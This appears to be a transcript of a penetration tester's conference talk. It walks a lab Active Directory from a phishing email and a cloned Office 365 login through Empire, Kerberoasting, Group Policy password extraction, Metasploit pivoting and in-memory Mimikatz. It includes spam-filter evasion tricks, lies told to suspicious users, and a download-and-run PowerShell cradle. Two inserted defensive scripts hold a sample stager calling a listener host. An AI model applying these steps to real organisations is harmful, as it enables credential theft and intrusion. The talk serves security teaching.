
All right, cool. Well, this is Attacker's Perspective, a technical demonstration of an email phishing attack. My name is Zach Davis. I'm a senior penetration tester at a really cool company called Protiviti. We've got a booth set up next door. We do lots of different projects within the information security realm, so definitely stop by and talk to us. I'm a penetration tester; I've been doing this for going on four years. I also have a background in IT audit and that side of the security world as well.

I want to talk briefly about my inspiration for this presentation. When I first got into security and I was going to my first DEF CON, my first BSides events, I saw all these really cool tools that people were dropping, awesome techniques that you can use on a penetration test. But due to my limited experience, it was difficult to see the big picture and how you could tie these tools together for a penetration test from start to finish, to go from Googling an organization's domain name to domain administrator on their network. So basically that's what I'm trying to do with this presentation. I want to show you how I run email phishing campaigns on a daily basis and how I do exactly that.

So, a quick overview. This is going to be pretty high level, but I'm going to show you some recon techniques for targeting an organization. I'm going to show you how to actually create a spear phishing email. I'm going to show you one of my favorite methods of payload delivery. We're actually going to exploit a workstation. I have a mini Active Directory domain with workstations, servers, and a domain controller set up on my laptop, so we're going to compromise a workstation to gain an initial foothold. I'm going to show you how I do network enumeration internally to stay under the radar and be a little bit quieter using native Windows functionality. And then I'm going to show you techniques for moving laterally and elevating privileges, and we're going to try and get domain admin on my little network.

So everybody take a second, pray to the demo gods. This is a really demo-heavy presentation and more than likely something's not going to work, given how this morning's gone so far. A quick background: I did not develop any of the tools I'm demonstrating today. I tried really hard to credit the right people, but if I credit the wrong person or say something dumb, please let me know. And a little bit about the target as well. I've done this talk, or variations of
this talk, at smaller industry conferences several times before. In the past, I always wanted to choose a realistic target, so I always chose the venue I was presenting at, whether it was a conference hall, casino, hotel, whatever it was. I was originally going to do that for this presentation, but I decided since there are probably going to be Drexel students here, I shouldn't teach them how to hack into Drexel. So the target's going to be completely fictional. Not all the pieces fit together quite right, but I think it'll make sense anyway.

So let's get started. One of my favorite scenarios when I'm going after end users is sending them a message requesting them to visit a site, and I impersonate one of their network administrators. More than likely there are some of those network administrators sitting in this room right now. So what we're going to do is impersonate a network or system administrator. We're going to request a user to visit what looks like a trusted site. They're going to authenticate to this trusted site and then they're going to be given a security update to install on their computer. In reality, when they log into the site, it's actually going to be my site; their credentials are going to be captured, and when they run the update, it's going to be my exploit code.

Before we get into that, we need to do reconnaissance and figure out how we're going to attack and how we're going to draft our phishing campaign. This is definitely the most important step on a penetration test. The more information you know about the target, the better off you're going to be. There are some really simple tools that I find work really well. I've been using theHarvester since literally my first day on my first pen testing internship. It's a tool coded by Christian Martorella of Edge-Security. Basically, you feed it a domain name and it scrapes Google for email addresses and domain information.

So I just wanted to show theHarvester really quick. Hold on a second, that's really small. Does that look all right, everybody? Bigger, smaller? We're good. theHarvester is a little Python script; you might have seen it before. Basically, you feed it some of these flags: -d for the domain, -l is the number of Google results you want it to search through (I usually do about 2,000), and with -b you supply the publicly available data source you want to go through. So as you can see there's Baidu, Bing, Google, LinkedIn, Twitter.
There's a whole bunch of different ones you can try. I always just use Google. I created some fake results to show you what actually comes out of this. So if you look here we have our theHarvester results: it harvested all these different email addresses from Google, and it also got us all these different host names and the associated IP addresses. So basically what we have now is a potential list of targets to send our phishing email to, and we also have some information about the organization's external infrastructure. So we can look through that, try and find a website, something trusted that we're going to be able to create a clone of, and try and direct our users to it so we can steal their credentials and shell their computer.

Let me take a quick step back. A lot of times I also tie in WHOIS lookups, just because it seems like a lot of network administrators like to put their name right on the domain registration information, even though it's really easy to hide that stuff today. So if you're on the blue team side, it's definitely something to think about. If I can go and just do a lookup on your domain and the network administrator's right there, then I'll do some LinkedIn and Google hacking, figure out who else works for the organization and if you're a good person to spoof as, and then I'm going to try and send my message as that administrator. Data.com is another really good data source. You basically create a free account, go there, plug in an organization's name, and it will give you a whole list of employees and a bunch of other good stuff. Sometimes you can get phone numbers and things like that as well.

There are also some better tools out there for doing reconnaissance: the recon-ng framework, coded by Tim Tomes (LaNMaSteR53). Check out his blog, it's really awesome, a lot of cool stuff. And if you haven't heard of Shodan, that's more for the host side of things, so you can go and plug in an IP address and get a list of ports and services, and a lot of times vulnerable systems. Again, if you're on the blue team side, I definitely recommend going and typing your own IP addresses in there and seeing what types of information attackers have on you. I know a lot of botnets will use information from Shodan when they're trying to find their targets to spread the botnet.

So, to our phishing site. I kind of mentioned before, I like using generic portals: OWA, VPN, Office 365. These are trusted portals that a user
authenticates to on a daily basis, so there's a degree of familiarity there and they're more likely to enter their credentials. And you have the added bonus: when I create a phishing site, I have them log in, then I feed them my malware. So if I successfully shell their system, I already have their password, which is a pretty good place to start if you're trying to do privilege escalation on the internal network. Another one I've been using a lot lately is a rewards site. Basically I send a message telling employees that they won something. When people think they won something, they do not think clearly. I sent one where I said they won a bunch of Omaha Steaks, and we ran it for a few days, and literally a month later I was getting angry emails to the inbox I had set up because people wanted their steaks. So definitely a good one to use as well.

So I set up this phishing site. I just went for something really generic, which is Office 365. This is actually hosted on my Kali instance. Literally all I did to set this site up was a quick Google hack for an Office 365 portal, a right-click Save As, grab the files, throw them up on my web server, and this was the result. Sometimes it's not quite that easy; you'll have to tweak the code a little bit. And honestly, if we were going to use this for a real phishing campaign, you'd have to add some PHP into the form so that you're going to capture the credentials and get everything to work right, so you have that information when you're starting your escalation. But for our purposes, this will work just fine.

Before we jump into that, I want to talk about the phishing email really quick. With phishing emails, the biggest problem is always bypassing spam filters. There are a couple different
ways you can do this. When I first got my start in penetration testing, all we would ever do is spoof message headers. This is getting harder and harder to do every day as spam filters are getting better. But if you're not familiar with spoofing message headers: basically, by manipulating the way you connect to an email server, the information you supply for the headers, and the information you supply for the body of the message, you can oftentimes send messages to an internal employee and make them appear to originate from another internal employee. Or maybe you can manipulate the domain very subtly so that, again, it's going to look like it's coming from an internal employee. I don't do this very much anymore. It's hard to do, and honestly it's just easier to go buy a domain.

But when you buy a domain, you kind of open yourself up to some new problems. Some of the newer spam filtering solutions are starting to get better, and they're doing things beyond your typical SPF lookups and things like that. What they do is, basically, every domain is categorized, and this is something that happens over time. So if your domain has any malicious content, or it's been reported with any malicious content, it's going to get dropped by the spam filter. Another thing it does is, if the domain has been registered within the last few days, it's going to get dropped by the spam filter. If you're on the blue team side, these are actually really great solutions. I highly recommend them. They make my job as a penetration tester a lot harder. If you're on the red team side, there should be some new tools coming out that are going to help you get around this pretty soon. At DerbyCon 6 this year, it was actually Will Schroeder and Sean Metcalf in their EvilCorp talk (definitely recommend checking that out if you haven't seen it) who talked about a tool that Andrew Robbins is dropping called Eminent Domain. Basically, what that allows you to do is scrape Google and other information sources for recently expired domains that have been previously legitimately registered. So you could find a domain that might fit your campaign that's recently expired, and you can pick it up. It hasn't been registered for the first time, so it's going to bypass that first level of time-based spam check. And it's also probably already been categorized as safe, and it takes a while for these things to update. So you might be able to get your message through using a recently expired domain.

Another problem is, if you're including a link in the message like I typically do, solutions like Proofpoint are starting to try and filter and obfuscate those links, so we're always looking for ways around that. I've found that simple is sometimes the better answer. I was working on a pen test a few weeks ago where they had a solution that basically just kept stripping out my links and sending my message to spam. What I finally did was type up my message, take a screenshot of it, delete all the text, stick the screenshot in the message, and then hyperlink directly from the image. So it still looked like an email, but all it was was one big image, and the link still worked and went right through to the user's inbox. The link wasn't stripped out; everything worked just like I wanted. So sometimes simple answers like that work really well.

And finally, presentation is everything. The better your message looks, the better off you're going to be. And it doesn't necessarily have to make sense if you're targeting end users. If you throw security buzzwords in there, it usually works pretty well, but making it look really nice and clean is really important. So real quick, the message that I drafted, the mock message, is based on a variation I use all the time. Can you really see that? It just says: "Office 365 security improvements. The Office 365 webmail portal has been updated to include new security features. All new employees must confirm access within the next 24 hours." So we're creating a sense of urgency; they need to do this or they're going to lose access to their email. "Please use the following link to log into the portal and download the update so corporate IT can confirm the installed enhanced security features." That doesn't really make much sense, but throw enough buzzwords in there and they'll click on it. "After logging in, click on the update button to automatically download and install the update." And then I throw a logo in there, and I always put whatever email address I'm sending the message from, because usually when I buy a domain you can set up a free webmail inbox; you set it up as "help desk" or the admin you're spoofing as and include that down there. People will always reply to the attacker, I've found. A lot of times I'll send an email message and they'll reply back, "Is this a phishing email?" And I respond back, "Of course not. Install the update. You need this."

So there's our message. The parts are starting to come together. Before we go any further, I want to talk really quickly about just my network setup. So basically, we have
a Kali Linux VM, a Windows 7 VM, and then two servers with Windows Server 2008: a domain controller and the app server. They're all sitting on the same virtual network on my Mac, but we're going to pretend there's a firewall in between Kali and everything else. So I'm not going to communicate directly from Kali to the domain controller or the app server. All we're going to do is shell Workstation01, and all traffic from that point on needs to be funneled through that session and our imaginary firewall, just like a real phishing campaign.

So now let's get on to the cool stuff: payload delivery. One of my favorite payload delivery methods is ClickOnce. Has anybody ever heard of Microsoft ClickOnce? Know what that does? A couple. Basically, Microsoft ClickOnce is a tool that Microsoft develops that allows administrators to have end users install updates and make configuration changes. One of the cool things about it is that a lot of times you can get it to run with elevated privileges. So obviously someone figured out how to weaponize this. Ryan Gandrud dropped the weaponization of ClickOnce at, I think it was, BSides Las Vegas 2015. He's got a really awesome blog post on this, and if you haven't checked out NetSPI's blog, there's a lot of really cool stuff on there as well, so I definitely recommend hitting it up.

So basically, with ClickOnce you're having Microsoft run your code. What you're going to make is a .NET console application written in C#. There are a lot of different things you can do with it. When Ryan originally set this up, he had it run an executable file generated by the Veil framework. It's since been modified; you can run PowerShell, you can do a lot of different things. And what's awesome about ClickOnce is you're running within the context of a trusted Microsoft binary, so any code that you feed through it is going to be running in that trusted space, and a lot of times application whitelisting solutions will be bypassed. So there are a couple different things you can do. What I'm going to be doing is just running a straight PowerShell command, so my C# is basically just going to open up a command prompt and execute a command for me. But there are other, cooler things you can do. I would definitely recommend checking out Justin Warner (sixdub). He's got a post on integrating his SharpPick tool into ClickOnce. If you haven't heard of SharpPick, basically it's a method for bypassing application whitelisting with PowerShell. You use the System.Management.Automation DLL to basically spin up a PowerShell runspace, and even if they're blocking powershell.exe, you can still get all the functionality of PowerShell through that method. So, really cool. Definitely recommend going and checking out that blog post.

Excuse me. So I just want to show you the code snippet really quick. I literally grabbed this; I'm not a developer, I'm a terrible developer. This is directly off Stack Overflow. I Googled "C# run PowerShell" and this is what I got. Basically all I did was swap out this command right here, which I'll be talking about in a second, but all we're really doing is opening up a command prompt that's hidden, feeding it some arguments, and starting the process. It's just that simple. So when you set one of these up and you compile the program, it's going to create a bunch of different files. All you have to do is zip them up, throw them on a web server, and then you link to an .application file that's set up. So I'll just show you my web server really quick.

So basically, besides that .application file, there's the application that's going to run, setup.exe. I don't even know what that does, but it does something with everything. And then there are some other application files. Like I said, I don't honestly know what they do, but I know that it works. You can go read up more on ClickOnce if you want to figure that out. So that's what you're going to get once you compile. But before we get this going, we need to talk a little bit about our command and what we're actually doing there. So I'm actually going to run through all the tools I'm going to use and then I'm
going to do the demo at the end. What we're going to be using for C2, or command and control, in this scenario is Empire. If you haven't heard of Empire, go check it out. It's an amazing tool, really fun to play with whether you're on the red team or the blue team. It does a lot of cool stuff. They just dropped the second iteration of it, version two, which has a lot of support for OS X, which is the Python portion of it. This tool is done by the Veris Group Adaptive Threat Division. There are a lot of other contributors; harmj0y does tons and tons of work on it, and I know there are others. Go check out their website and they've got the credit for everybody. It's a PowerShell and Python post-exploitation agent. It does everything. If you've been on the red team side for any amount of time, you know about all the different PowerShell attacks. I'm sure you've been to the PowerShellMafia GitHub. Well, a lot of the amazing tools that have been developed weaponizing PowerShell in the last few years have all been baked directly into Empire. So basically you don't have to mess around with the crappy syntax and pulling down scripts and all this. If you can get an Empire agent on a system, you can use all these awesome PowerShell tools to enumerate, exploit, run shellcode, do all sorts of awesome stuff.

So the modules we're going to be looking at today: PowerView. We're going to be using PowerView functionality within Empire to enumerate the network. Get-GPPPassword: if you don't know what group policy password files are, I'll go over that when we get to it, but basically we're going to use it to extract cleartext passwords from some group policy files. Then finally we're going to talk about Kerberoast. Actually, I'm going to talk about that right now.

So Kerberoast is a tool, or more of a technique, that was dropped by Tim Medin in like 2014. It used to be a fairly manual process, but it's been automated over the years. harmj0y and mubix have really awesome blog posts on this topic; I read them extensively when I was developing this, so I definitely recommend going and checking those out. So basically what you're doing is exploiting service principal names and their associated Kerberos tickets within Active Directory. A service principal name, and this is straight from Microsoft, is a unique identifier of a service instance. SPNs are used by Kerberos to associate a service instance with a service logon account. And then this is straight from mubix's blog: basically you're mapping a service running on a server to an account it's running as, so that it can do or accept Kerberos authentication. So basically, when you have running service accounts and you tie them to a domain user, it needs to be able to authenticate to Kerberos; that's what the service principal names are used for. What's cool about this technique and pulling tickets from service principal names is that any domain user can request a Kerberos ticket for any service, and domain trusts are in scope. So if you have a forest, you have domain A and domain B, and you have a domain user on domain A, and there's a trust relationship between the domains, you can request SPN tickets for domain B, which is pretty cool. Once you have the tickets, you can pull them down and crack them offline. With Empire, it sticks them right into the right hash format for you; you can choose Hashcat or John the Ripper. It used to be you had to run some scripts to convert them to the right format. A cool thing about these accounts, too, is they're frequently configured with bad passwords that never change, and a lot of times the permissions are misconfigured with service accounts as well, so they'll be running as domain admin, or at least maybe have local admin on some servers, things like that. So we're going to pull some Kerberos tickets in a second.

But first, I want to talk a little bit about Metasploit. If you don't know what Metasploit is and you're in the security realm, you've probably been living under a rock. It's an exploitation framework developed by HD Moore. It does a lot of really cool stuff. I honestly don't use it for exploitation very much; what I mostly use it for is C2, the auxiliary modules, and post-exploitation. The Meterpreter shell baked into Metasploit is really awesome; a ton of functionality is baked right into it for post-exploitation. Some of the auxiliary modules are really good. I used to use them a lot more, but now a lot of that functionality has been baked into different PowerShell tools, but I still like to keep this in my back pocket if I need it. My favorite thing to use Metasploit for is tunneling. It just makes it really, really easy. It's really easy to forward ports and pivot through systems, basically to attack other systems. So that's what we're going to be using it for today, and we'll show that in a second.

Finally, I quickly want to talk about Mimikatz. Again, if you don't know what Mimikatz is, you've probably been living under a rock. It's a tool developed by Benjamin Delpy, or gentilkiwi. Straight from his blog: it's a little tool to play with Windows security. If you know what it is, it's a lot more than a little tool. It does a lot of really cool things. You can extract plaintext passwords from memory, you can extract hashes and tickets, launch pass-the-hash attacks, launch pass-the-ticket attacks, do golden ticket attacks. There's also something called silver ticket attacks that I've just discovered; I've got to read up on that. But basically, a ton of cool stuff that you can do with Mimikatz. So we're going to be demonstrating that one today, too.

So now we're ready for the fun stuff, the demos. Let's all hope this works. First thing I want to show you is Empire. If you haven't used Empire, it's a really cool tool. Basically, with Empire, there are modules, which are going to be your PowerView, Invoke-Shellcode, all the different things you can do with it. Then there are listeners, pretty much the same as an exploit handler if you're familiar with Metasploit; it's going to listen for incoming connections. And then there are agents, which are basically the beacon that's going to connect back and forth and send your commands up and down, similar to a Meterpreter shell. So, just to set up listeners: I already have one set up. You basically just type "listeners", then I think it's "uselistener". I'll show you some info on it. Basically, all this is already set and ready to go. The only thing I did was change the port to 8080, because we're already hosting our website on port 80, so we needed to choose an open port. Once you have that, you just type "execute" and you'll start your listener. Once you have your listener, you can type "launcher" and then the development framework you want to use, either Python or PowerShell, and, I forgot, the listener name. It's going to give you this big long command. This is what I stuck in my ClickOnce code. Basically, we're just going to open up a PowerShell window; there are some bypass flags for execution policy and things like that, and then we're going to feed it this big long encoded command that's going to be a script that's going to send back our agent. So we have that within our ClickOnce. I was actually going to send a phishing email, but it didn't want to go when I was testing right before this.
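The "big long encoded command" the launcher produces is powershell.exe called with an -Enc (EncodedCommand) argument, which is just base64 over the UTF-16LE bytes of the stager script. The following is an added example for this transcript, not code from the talk and not part of Empire: it pulls the encoded argument out of a process command line the way a defender would see it in a 4688 or Sysmon process-creation event, decodes it without running it, and flags the download-cradle indicators. The command line and stager text are constructed here, and the 10.0.0.5:8080 listener address is an assumption.

```python
"""Decode a PowerShell -EncodedCommand launcher and flag download-cradle indicators.

Added example for this transcript; not the talk's code and not Empire's. The
sample command line is constructed below from a plaintext stager-like string, so
nothing is fetched or executed; the decoded text is only inspected.
"""
import base64
import re

# powershell.exe accepts -e, -ec and any prefix of -EncodedCommand from -enc onward.
ENC_FLAG = re.compile(r"^-(?:e|ec|enc[a-z]*)$", re.I)

# Indicators worth alerting on in the decoded script (assumed, tune for your estate).
INDICATORS = {
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest", re.I),
    "exec_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "amsi_tamper": re.compile(r"amsiinitfailed|amsiutils", re.I),
}

def encode_command(script: str) -> str:
    """Encode exactly as -EncodedCommand expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_command(b64: str) -> str:
    """Inverse of encode_command; restores '=' padding a logger may have trimmed."""
    b64 = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16-le")

def extract_encoded(command_line: str):
    """Return the base64 token that follows an -Enc style flag, or None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.match(tok):
            return tokens[i + 1].strip('"')
    return None

def analyze(command_line: str) -> dict:
    """Decode any encoded payload and report which indicators appear in the
    command line or the decoded script."""
    enc = extract_encoded(command_line)
    decoded = decode_command(enc) if enc else None
    haystack = command_line + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"encoded": enc is not None, "decoded": decoded, "indicators": hits}

# Constructed sample: a stager-shaped script and the launcher line that wraps it.
SAMPLE_STAGER = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString('http://10.0.0.5:8080/index.asp')"  # assumed listener
)
SAMPLE_COMMAND_LINE = "powershell -NoP -sta -NonI -W Hidden -Enc " + encode_command(SAMPLE_STAGER)

if __name__ == "__main__":
    result = analyze(SAMPLE_COMMAND_LINE)
    print("decoded:", result["decoded"])
    print("indicators:", ", ".join(result["indicators"]))
```

Feed it the CommandLine field of each powershell.exe process-creation event; an encoded argument by itself is common in legitimate automation, but encoded plus IEX plus a DownloadString cradle from a hidden window is the launcher pattern described in the talk.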
So, we're just going to go and look at um our user's inbox. So, this is our user Bob. uh he is a end user on this network. He's not very smart. So he's going to run and uh click on this fishing email. So basically we're here we are Office 365 site. He logs into this every day. This looks good. Doesn't want to lose access to his email. Just sign in. And we're going to click update right here. Um I just realized I lost my screenshot. I had an issue with the PowerPoint this morning, but it's called Click Once. In reality, it pops open a box. Uh if you ever installed Chrome, uh I think pretty recently they started
doing this, but Chrome is installed with Click Once. And basically, um you it pops open a box and it just gives I think it says unknown publisher, the name of the application. It says, "Do you want to run this?" You click run, it's going to run your code uh for you. Um I was going to show a screenshot, but like I said, I I I missed that. Um go Google it. It's right there. So, we ran our code. Now, we have a new agent. So, we can type agent and we've actually got two of them. I'm not sure why. One of those I must have been testing, but we're going to interact with the second one, the
newer one. Um, so we're going to rename that so it's easier to work with. Call this Bob. Now, we can interact with Bob. Uh, type info. We get a bunch of system information. Uh, and now we're ready to start actually doing some network enumeration. So, like I said, we're going to use PowerShell. Um, for that, uh, I don't remember the name of the modules. I just want to know I want to use Power View. So, we're going to search module Power View, and it's going to give us all the modules, uh, within the PowerShell or Power View um, folder. So, there's all sorts of really awesome stuff you can do. Uh, look through these. If you're familiar with Power
View, pretty much everything's baked in, I think. Um, but we just want to do some general enumeration. So, the first thing we want is um a list of users on the network or I mean a list of computers on the network. So, we're going to go use module uh situational awareness network power view get computer. There are some options you can set. We don't need to set any of them. We're ready to go. So, we're just going to click run. Should start a job for us, and it's going to kick us back all the computers. Keep in mind, there's only three computers on my network, but if you run this in a 50,000 node network, you're going to get a lot of
output. So you want to be able to output this to a file so you can parse through it later and access it as you're trying to elevate privileges. But we got our three servers: DC01, AppServer01, and Workstation01. Next we want to get an idea of the types of users we have. So we're going to use another PowerView module: usemodule situational_awareness/network/powerview/get_user. Same thing, don't need to set anything. We're going to run that. Again, if there's a lot of users on the network, you're going to get a lot of output; you're going to want to stick this out to a file. That ran.

So if we start looking through this list, we can see the different users. This is a little messy, a lot of information there, but like I said, best to output to a file so you can parse through it. So here we have our administrator account on the domain, and we see it's a member of the Domain Admins group. Let's scroll down a little bit farther. There's some built-in Microsoft accounts in there, I think. We got this app server admin; looks like it's in a server admin group, so that might be a good account we might want to target. Down here we've got Bob. We already know about Bob, so we're not worried about that.

Here's something interesting, though. We have a service principal name for an MSSQL account. Looks like there's an account called SQLService, and it's running on AppServer01. So definitely want to keep that in our back pocket and check back on that later when we're trying to elevate privileges. But before we go and check out Kerberos, I want to show you my all-time favorite Active Directory misconfiguration, which is Get-GPPPassword. If you don't know what that is, basically when you create group policy files, well, really when you create any group policy file or group policy object, all sorts of configuration files are created and stuck on the SYSVOL share of the domain controller. So when a client boots up, it's going to check in to the domain controller and check those configuration files to apply the settings. If you create a GPO that has a password associated with it, like let's say you push out a local admin password to all your clients, there's a password there, and an encrypted version of that password gets stored on that share. For some reason Microsoft, in their infinite wisdom, released the key that they use to encrypt those passwords. I've heard it was a mistake; I've heard they did it on purpose. I don't really know. But basically with a little Ruby script, you can grab those passwords right out of the SYSVOL share, decrypt them, and sometimes you have local admin. I've found domain admins. I've found all sorts of good passwords. You can do this with a manual process; there's a PowerShell script you can run to do it, or since we're using Empire, it's baked right in. So let's do that quick. GPP. So usemodule privesc/gpp. Again, we don't have to set anything with this. It's just going to go check, scrape the passwords, decrypt them for us, and put them to the screen.

So as you can see, it went and found that there's a local admin password that's been pushed out to the clients, and it's got this local pass right here. And it shows the path where it found it; it's in a Groups.xml file on our domain controller. So if we wanted to, with Empire we could just start passing that around and see if we could get access to any other systems, but I want to show you some tools outside of Empire. I didn't want to just do an Empire demo, but I very well could have. Seriously, go check it out. It does so many cool things.
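The blue-team counterpart to what the speaker just demonstrated is a SYSVOL audit that finds leftover Group Policy Preference passwords before anyone else does. The script below is an added example written for this transcript; it is not code from the talk, from Empire, or from Get-GPPPassword. It walks a directory tree the way you would walk the SYSVOL share, parses every .xml file, and reports each preference item that still carries a cpassword attribute. It deliberately does not decrypt anything: the presence of the attribute is the finding. The Groups.xml samples, the GPO folder names and the cpassword blob are all constructed placeholders, not real data.

```python
"""Audit a SYSVOL-like tree for Group Policy Preference items that still carry a cpassword.

Constructed example: walks a directory tree the way a defender would walk
\\<domain>\SYSVOL, parses every .xml file, and reports any element with a
cpassword attribute. No decryption is attempted; the finding itself is what
needs remediation (delete the preference item, rotate the password it set).
"""
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample of a Groups.xml with a leftover cpassword. The blob is a
# placeholder, not a real encrypted value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin"
        image="2" changed="2015-01-01 12:00:00" uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED-NOT-A-REAL-BLOB" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="LocalAdmin"/>
  </User>
</Groups>
"""

# Constructed sample of a preference file that is fine: no password attribute.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)">
    <Properties action="U" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"/>
  </Group>
</Groups>
"""

Finding = Tuple[str, str, str]  # (file path, preference item type, account name)


def scan_xml_text(text: str, path: str) -> List[Finding]:
    """Return one finding per element in `text` that carries a cpassword attribute."""
    findings: List[Finding] = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return findings  # not well-formed XML; nothing to report for this file
    for parent in root.iter():
        for elem in parent:
            if "cpassword" not in elem.attrib:
                continue
            # Groups.xml names the account in userName; other GPP files
            # (Services, ScheduledTasks, DataSources, Drives) use other
            # attributes, so fall back to the parent item's name.
            account = (elem.attrib.get("userName")
                       or elem.attrib.get("accountName")
                       or elem.attrib.get("runAs")
                       or parent.attrib.get("name", "<unknown>"))
            findings.append((path, parent.tag, account))
    return findings


def scan_sysvol(root_dir: str) -> List[Finding]:
    """Walk a SYSVOL-like tree and scan every .xml file under it."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_xml_text(fh.read(), path))
    return findings


def demo() -> List[Finding]:
    """Build a throwaway tree mimicking the SYSVOL Policies layout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        hit_dir = os.path.join(tmp, "Policies", "{CONSTRUCTED-GPO-GUID-1}",
                               "Machine", "Preferences", "Groups")
        clean_dir = os.path.join(tmp, "Policies", "{CONSTRUCTED-GPO-GUID-2}",
                                 "Machine", "Preferences", "Groups")
        os.makedirs(hit_dir)
        os.makedirs(clean_dir)
        with open(os.path.join(hit_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        with open(os.path.join(clean_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CLEAN_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for path, item, account in demo():
        print(f"cpassword found: item={item} account={account} file={path}")
```

Point `scan_sysvol` at a mounted copy of the SYSVOL share and treat every finding as a password that must be assumed compromised: delete the preference item and rotate the account, since the patch the speaker mentions later (MS14-025) stops new passwords from being stored but does nothing about files already sitting there.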
So before we use that local pass, I want to check out that service principal name I found and show you guys how Kerberoast works. We are going to use Empire for that. So again, we're going to search module. Why is this? Oh, I've got to do back. Kerberoast. So we're going to usemodule credentials/invoke_kerberoast, info. The only thing I set here is the output format. I think by default it's on hashcat. I have John installed on my Mac, so that's what I'm going to use for password cracking, so I just changed the output. We're going to run that. Starting another job for us. As you see, it kicked out a nice Kerberos ticket for our SQL service account. So now we see if that has a bad password, see if we can crack that offline.

So I already copied this over. Oops, that's not what I want to do. So we have our hash here. I have a wordlist that has the password in it because I want this to go quick. So we just got to spin up John. I really need to put this in my path. John's working. So we're just going to specify our hash file, --wordlist equals our list. Going to run that. As we can see right here, we cracked our password. So now we have the cleartext password for this service account. It's a domain account, so we can probably log in with it unless they've specifically disabled interactive logon, which you should definitely do for all your service accounts.

So I want to try RDP because I like using the GUI. So we need to figure out a way that we can tunnel through this workstation we exploited in order to RDP to other systems on the network. So that's where Metasploit comes in. Great tool for tunneling. So we need to set up a handler to receive our session. I've already done this. So basically I just give the IP address and the port to connect back on. Since we're going through a firewall, I want to use 443. It's pretty unlikely that outbound 443 is going to be blocked, so this way we'll avoid any egress filtering rules that might be in place. So we're going to exploit that and start a job, and so we're good to go there.

So now we need to find a way to inject our shellcode. Once again, you can inject shellcode with Empire really, really easily. Once again, the search function is really awesome. I probably should have memorized these by now, but I keep doing it. And we're just going to search shellcode. And right here we have code_execution/invoke_shellcode. So that's what we're going to use. usemodule code_execution/invoke_shellcode, info. So we need to tell it where to connect back to. So we're going to set the LHOST to 172.16120, which is our Kali box. Set the LPORT to 443. One more time, info. We already have the reverse HTTPS payload ready to go, so this should work. We're just going to type execute and see if we get our Meterpreter session. And we did. So now we have a session, our Meterpreter session, to Bob's workstation. So we can interact with that. ps to make sure it's live. We can see processes, so we know we're good.
So now we need to set up our port forwarding, since we're going to tunnel through this. The portfwd command is super easy. You only need a couple options. What we're going to need is the local port from our Kali instance that we want to forward; the remote port we want to connect to, so on the system we're trying to reach, we're going to pivot through the Meterpreter session and hit another system, so we need the port we're going to connect to there, and since we're doing RDP, it's going to be 3389; and then finally the remote host we're going to connect to. So we're going to do portfwd. We're going to add a route. So -l, the local port to listen on, we're going to do 3389. Remote port to connect to, again it's going to be 3389. Why do I keep doing that? And then the remote host, which is going to be our app server. Over here. Make sure that thing's still up. 172.16211.133. Our domain controller is going to be 134. So we have that set up. Now all we have to do to connect to that system is, oops, our Remote Desktop to 127.0.0.1. So remember, we're forwarding our local port through the Meterpreter to the remote port on the system we're trying to connect to. This has been giving me trouble, of course. Thank you, Matthew. So we've got to flush that out. 3389. Try this one more time. And there we go. Now we're RDPing through our Meterpreter session to the system we want to hit. We need to log in to our domain, which is fake STSU, and our account is SQLService. We're going to type that password in and boom, we're already RDP'd in.

So we're going to hope that there's some administrators logged into this system. I'm getting a little short on time, so I'm just going to tell you there are administrators logged into this system. So we need to find a way to run Mimikatz on this system. I don't like touching disk. There's no AV on this computer, but at all cost, always avoid touching disk on a penetration test. So we're going to use PowerShell, the traditional method, to run our code. Basically, I've hosted an Invoke-Mimikatz PowerShell script right here. We're going to use a PowerShell command to pull that down from our web server, inject it right into memory without ever touching disk, and run it. We've got to be running as an administrator for Mimikatz to work. So I've got that command here. I think I've got all my passwords there too, if you guys take a look at it. So basically what we're doing in here is IEX, and I realize that's really small: Invoke-Expression, opening up a New-Object, we're going to DownloadString, which is going to be our script that we're going to run, Invoke-Mimikatz and -DumpCreds.

Let's hope this works. Had trouble with this too, so it might not work. Oh, it worked. So now we can pop back up through here and see what kind of creds we got. So right there we got our SQL password again; not too concerned with that. But right here we see that we got our administrator, who's the main administrator on the network. So I was going to RDP through, but again, I'm running a little short on time. So we're just going to log into this system, show you that the creds work. Is this the right one? Here we
